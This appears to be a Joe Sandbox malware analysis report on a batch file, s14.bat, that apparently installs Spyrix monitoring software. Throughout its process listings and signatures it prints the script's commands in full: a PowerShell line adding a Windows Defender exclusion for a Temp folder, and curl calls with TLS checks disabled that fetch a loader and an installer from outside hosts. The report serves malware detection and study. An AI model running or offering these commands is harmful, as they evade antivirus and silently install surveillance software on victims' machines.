Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
s14.bat

Overview

General Information

Sample name:s14.bat
Analysis ID:1523868
MD5:db54c87742c96b03caeb3774ecb51438
SHA1:f6a559b83cbc3b82cb0a5c2acb64b6d4038cb593
SHA256:634c59030c60c10818f142277376c9ba06d14110f41e544f6f3bae822352d0b9
Tags:batfiledn-comuser-JAMESWT_MHT
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Use Short Name Path in Command Line
Uses reg.exe to modify the Windows registry

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6336 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\s14.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 4600 cmdline: reg query "HKU\S-1-5-19\Environment" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • powershell.exe (PID: 4296 cmdline: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • curl.exe (PID: 7656 cmdline: curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • curl.exe (PID: 7688 cmdline: curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • timeout.exe (PID: 7704 cmdline: timeout 10 MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • curl.exe (PID: 7832 cmdline: curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • timeout.exe (PID: 7852 cmdline: timeout 10 MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • curl.exe (PID: 7912 cmdline: curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • powershell.exe (PID: 7928 cmdline: powershell.exe Remove-MpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'", CommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'", CommandLine|base64offset|contains: i~yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\s14.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6336, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'", ProcessId: 4296, ProcessName: powershell.exe
Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'", CommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'", CommandLine|base64offset|contains: i~yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\s14.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6336, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'", ProcessId: 4296, ProcessName: powershell.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'", CommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'", CommandLine|base64offset|contains: i~yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\s14.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6336, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'", ProcessId: 4296, ProcessName: powershell.exe
Sigma detected: Use Short Name Path in Command Line
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'", CommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'", CommandLine|base64offset|contains: i~yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\s14.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6336, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'", ProcessId: 4296, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'", CommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'", CommandLine|base64offset|contains: i~yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\s14.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6336, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'", ProcessId: 4296, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 87.7% probability
Source: unknownHTTPS traffic detected: 167.114.14.170:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /loader/link.php?prg_id=sfk HTTP/1.1Host: cdnbaynet.comUser-Agent: sfk-dst-loader-2.0Accept: */*
Source: global trafficDNS traffic detected: DNS query: cdnbaynet.com
Source: curl.exe, 0000000D.00000002.1425120515.000001C1E4530000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.1425195815.000001C1E456A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1424973949.000001C1E4546000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.1425120515.000001C1E4538000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1424909503.000001C1E456A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.1425120515.000001C1E4546000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1424929417.000001C1E4543000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1424861129.000001C1E456A000.00000004.00000020.00020000.00000000.sdmp, s14.batString found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk
Source: curl.exe, 0000000D.00000002.1425120515.000001C1E4530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk9j
Source: curl.exe, 0000000D.00000002.1425120515.000001C1E4530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkWinsta0
Source: curl.exe, 0000000D.00000002.1425120515.000001C1E4530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkcurl.exe
Source: curl.exe, 0000000D.00000002.1425120515.000001C1E4538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkhmi
Source: curl.exe, 0000000D.00000002.1425120515.000001C1E4530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkkj
Source: timeout.exe, 0000000F.00000002.1525812168.000001B142E49000.00000004.00000020.00020000.00000000.sdmp, timeout.exe, 00000012.00000002.1627509145.00000233D6278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.co
Source: curl.exe, 00000013.00000002.1627992980.000001D1823D0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1627992980.000001D1823D9000.00000004.00000020.00020000.00000000.sdmp, l.13.drString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: curl.exe, 00000011.00000002.1526338394.000001E7C1B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe6M
Source: curl.exe, 00000013.00000002.1628051671.000001D182570000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1627992980.000001D1823D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:
Source: curl.exe, 0000000E.00000002.1425917834.000001C9F6150000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1526338394.000001E7C1B90000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1627992980.000001D1823D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeWinsta0
Source: curl.exe, 0000000E.00000002.1425917834.000001C9F6150000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1526338394.000001E7C1B90000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1627992980.000001D1823D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe
Source: curl.exe, 00000011.00000002.1526338394.000001E7C1B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exedM
Source: curl.exe, 0000000E.00000002.1425917834.000001C9F6159000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exei
Source: curl.exe, 00000011.00000002.1526338394.000001E7C1B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exetM
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownHTTPS traffic detected: 167.114.14.170:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: classification engineClassification label: mal60.evad.winBAT@20/17@1/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_03
Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user~1\AppData\Local\Temp\s14Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\s14.bat" "
Source: C:\Windows\System32\reg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\s14.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 10
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 10
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\l" https://cdnbaynet.com/loader/link.php?prg_id=sfkJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 10Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 10Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"Jump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
